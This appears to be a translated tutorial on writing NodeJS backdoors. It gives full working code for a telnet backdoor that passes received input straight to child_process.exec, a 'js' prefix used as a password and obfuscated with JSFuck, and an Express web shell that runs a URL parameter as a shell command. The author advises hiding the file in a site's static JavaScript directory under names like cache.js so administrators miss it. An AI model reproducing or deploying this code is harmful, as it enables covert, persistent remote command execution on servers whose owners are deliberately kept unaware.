NodeJs backdoor program

NodeJs backdoor program

0x00 Preface

Start with the language to write a program that does not exist in the market.

0x01 why NodeJs? I personally love the JavaScript language, and what we are talking about today is NodeJS, a branch of the JavaScript language. NodeJS itself is a Web server and also a back-end language. This is especially important because we only need to download a NodeJs to complete a series of operations, which saves a lot of trouble. Even if it is discovered by the O & M personnel, it is thought that the development department is writing a project about NodeJs.

NodeJs is a very young language that many people have never learned. I have seen O & M personnel understand PHP and Python, but I have never seen NodeJs.

In the next chapter, I will use telnet communication and web communication to write the programs behind NodeJs.

Next

0x02 preparations

For NodeJs installation, Baidu.

The node. js version is 5.1.0.

After NodeJs is installed, we can create a NodeJs file in any directory. Of course, I recommend writing it in the JavaScript directory in the static directory on the server website because it is a JavaScript file, it is highly concealed. I am in trouble ~ Create a nodeDemo directory under the directory to create the NodeJs file.

I am building app. js here. Of course, you can use base. js, cache. js, cookies. js, and so on, just to hide it.

0x03 telnet communication Backdoor

When using telnet in NodeJs for communication, you need to call the exec method in the net Library and child_process library.

The Code is as follows:

var net = require('net');var exec = require('child_process').exec;

Use the createServer () function to create a connection. The Code is as follows:

var server= net.createServer(function(conn){    //code});

Next, we need to solve the problem of string encoding. Otherwise, we can't really look at the garbled characters:

conn.setEncoding('utf8');

Note that there is no-, not UTF-8. Remember.

To be nice, I also added conn. write ('\ n'); well, it looks much better.

OK. After the connection is successful, the input string is processed. Here we need to use the on function:

conn.on('data',function(data){//code});

In the input string, delete the carriage return string.

data=data.replace('\r\n','');

This code is very important.I got stuck in this trap for 20 minutes. Many people may ask if it's just a carriage return. What happened when I press the two carriage return keys. This is the problem. Why? Isn't it true here ?, Instead, the system cannot display this character? It is a string that cannot be displayed.

The data variable here is the command we entered. Next we will use the exec method in the child_process library.

exec(data,function(error,stdout){    //code});

The first parameter of exec is data, that is, the code to be run. The following parameter is a function. One parameter in this function is error, it is an error in the feedback command. The two parameters stdout are the feedback after the command is run.

First, let's determine whether an error exists in the running command:

if(error !== null){    conn.write(error + '\n');    return false;       }

If there is no error, the null String is returned, and we use this as the judgment condition. Conn. write is a character fed back on the telnet terminal, which is equivalent to echo in php.

Return false; prevents the program from continuing to run down.

The following shows the command feedback:

conn.write('########################start\n\n' + stdout + '\n########################end\n\n');

To be more intuitive, I use # start and # end to mark the feedback area.

After the server variable is OK, the program listening port is run.

server.listen(3000,function(){    console.log('OK');});

Listen to port 3000 and display OK in the terminal.

The complete code is as follows:

var net = require('net');var exec = require('child_process').exec;var server= net.createServer(function(conn){    conn.setEncoding('utf8');    conn.write('\n');    conn.on('data',function(data){        data=data.replace('\r\n','');        exec(data,function(error,stdout){            if(error !== null){                conn.write(error + '\n');                return false;                   }            conn.write('########################start\n\n' + stdout + '\n########################end\n\n');        });    });}); server.listen(3000,function(){    console.log('OK');});

Now let's test:

Open another terminal and enter telnet 127.0.0.1 3000

Run the following commands:

OK. Now you only need to add a user to control the machine again.

There is a flaw here, that is, there is no password verification. I specifically checked the functions in the net Library, but did not find password verification, so I came up with another method to replace password verification. The Code is as follows:

if(data.substring(0,2) == 'js'){    data = data.substring(2);}else{    return false;}

Js is added before each command to run. If no, nothing is output. Example:

When I input ls for the first time, the program does not run. The command runs successfully only after the js string is added to the current interface.

Writing js strings directly is too conspicuous. Let's encrypt it. Because node. js uses the v8 engine, the JavaScript black magic in the browser can also be used in node. js. We can encrypt the js at http://www.jsfuck.com/and the strings are:

(+(!+[]+!+[]+!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]

Now the NodeJs backdoor code looks like this:

Now let's test whether it can be used:

Perfect.

0x03 web communication Backdoors

In the previous section, telnet communication is used as a backdoor. Now let's talk about web communication backdoors.

Is the express framework used here? Anyone who has played NodeJs knows that it is basically a required framework for NodeJs.

Install the express framework on your own.

First, create a website directory to store the following programs.

Express node

cd node && npm install

After the process is completed, it is OK. Now, go to the routes directory. Modify the index. js file.

vim router/index.js

This is the previous index. js code. Now let's modify it.

Add the code in the third line:

var exec = require('child_process').exec;

Delete the 6th lines of code and modify it:

exec(req.query.webshellPassword,function(error,stdout){    if(error !== null){        res.send(error);        return false;    }    res.send(stdout);});

It is basically similar to the telnet communication backdoor code in the previous section. The following code appears:

req.query.webshellPassword

Req. query is used by NodeJs to obtain URL parameters. WebshellPassword is the parameter name. It is equivalent to $ _ GET ['webshallpassword'] in PHP code.

The complete code is as follows:

Now, go to the node directory. Run it:

Open the browser and enter http: // 127.0.0.1: 3000 /? WebshellPassword = ls

The result is as follows:

If the kernel is a Windows system and the linux Command set is not installed, change ls to dir.

Let's take a rough look at what we can do:

Everything you want can be done, and your mood instantly becomes more beautiful.

The next chapter describes how to use a website to manage backdoors. Ma no longer has to worry about holding a computer every day.